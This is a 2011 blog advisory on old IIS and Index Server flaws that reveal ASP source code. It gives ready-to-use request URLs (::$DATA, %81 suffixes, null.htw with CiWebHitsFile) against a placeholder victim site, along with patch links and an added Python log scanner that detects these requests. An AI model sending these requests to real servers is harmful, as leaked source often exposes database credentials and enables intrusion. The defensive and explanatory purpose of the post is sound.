
Thursday, 10 November 2011

Viewing ASP source code through new vulnerabilities

by ieplayboy

The early vulnerabilities for viewing ASP source code worked by appending suffixes such as ::$DATA or %81 to the file name.

For example http://localhost/default.asp::$DATA or http://localhost/default.%81. However, these vulnerabilities only existed on Windows NT4 as a result of an incorrect installation order.

With the usual installation order of nt4 + nt sp3 + ie401sp1 + option pack + sp4, the ::$DATA vulnerability is definitely not present.

The Cerberus security group found a third vulnerability in Microsoft Index Server that allows the source code of ASP and other pages to be viewed. It affects Index Server running on IIS4 or IIS5, and even systems that have applied the recent source-viewing patches, or that have no .htw files at all, have the same problem. Obtaining the source code of ASP programs, or even of the global.asa file, is without doubt a very serious security risk for the system: such code often contains user IDs and passwords, as well as the path and name of the database. This is very valuable to an attacker collecting system information for the next step of an intrusion.

However, this vulnerability no longer exists on Windows 2000 Advanced Server and Windows 2000 Server.

Whether a system is affected depends mainly on whether Index Server is installed.


Affected systems: Microsoft IIS 4.0, Microsoft IIS 5.0

Exploitation of the vulnerability:

Because the 'null.htw' file is not a real file mapped on the system, but only a virtual file held in system memory, a request for null.htw is handled by webhits.dll by default even if you have deleted every real .htw file from your system. IIS therefore remains exposed to this vulnerability.

Sending a request such as:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full

returns the source code of default.asp in the web root directory.

Example:

The path /default.asp is resolved from the web root. So for a site's page http://www.victim.com/welcome/welcome.asp the corresponding request is:

http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full


Solution:

If the functionality provided by webhits is required by the system, download the appropriate patch. If it is not needed, simply remove the .htw mapping with the IIS MMC administration tool.
Microsoft has released a patch for this problem:
Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Windows 2000 Indexing Services:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
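For administrators who cannot patch or remove the .htw mapping immediately, the patterns described above (the ::$DATA and %81 suffixes, and null.htw requests whose CiWebHitsFile points at a script) are easy to spot in IIS logs. The following Python script is an added example, not part of the original post; the log lines it scans are constructed, and the W3C extended log field names are assumed to be those listed in its #Fields header.

```python
"""Flag IIS log entries matching the ASP source-disclosure patterns described
above: ::$DATA and %81 filename suffixes, and null.htw / webhits.dll requests
whose CiWebHitsFile points at a script file.  Assumes W3C extended log format."""
from urllib.parse import parse_qs, unquote_to_bytes

SCRIPT_EXT = (".asp", ".asa", ".inc")  # source that must never be served

# Constructed sample log lines (not from the original page).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-11-10 10:00:01 192.0.2.10 GET /default.asp - 200
2011-11-10 10:00:02 192.0.2.11 GET /null.htw CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full 200
2011-11-10 10:00:03 192.0.2.12 GET /default.asp::$DATA - 200
2011-11-10 10:00:04 192.0.2.13 GET /default.%81 - 404
2011-11-10 10:00:05 192.0.2.14 GET /query.htw CiWebHitsFile=/docs/readme.txt&CiRestriction=none 200
"""

def classify(stem: str, query: str):
    """Return a reason string if the request matches a known pattern, else None."""
    raw = unquote_to_bytes(stem)          # decode %xx without losing high bytes
    if b"::$DATA" in raw.upper():
        return "NTFS ::$DATA stream suffix"
    if raw.endswith(b"\x81"):
        return "%81 trailing-byte suffix"
    if raw.lower().endswith(b".htw"):
        # webhits.dll hit-highlighting is legitimate for plain documents;
        # only a CiWebHitsFile that names script source is suspicious.
        for target in parse_qs(query).get("CiWebHitsFile", []):
            if target.strip().lower().endswith(SCRIPT_EXT):  # strip() drops the %20 trick
                return "webhits.dll CiWebHitsFile points at script source"
    return None

def scan(log_text: str):
    """Parse W3C log text and return [(c-ip, cs-uri-stem, reason)] for flagged lines."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        reason = classify(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-"))
        if reason:
            hits.append((rec.get("c-ip"), rec["cs-uri-stem"], reason))
    return hits

if __name__ == "__main__":
    for ip, stem, reason in scan(SAMPLE_LOG):
        print(f"{ip} {stem} -> {reason}")
```

A hit on a fully patched server still deserves a look, since the request shows someone probing for source disclosure.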
Related links:

http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspinc.htm
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspsucurityone.htm
http://soft.xxinfo.ha.cn/mudfrog/txt/see-asp.htm
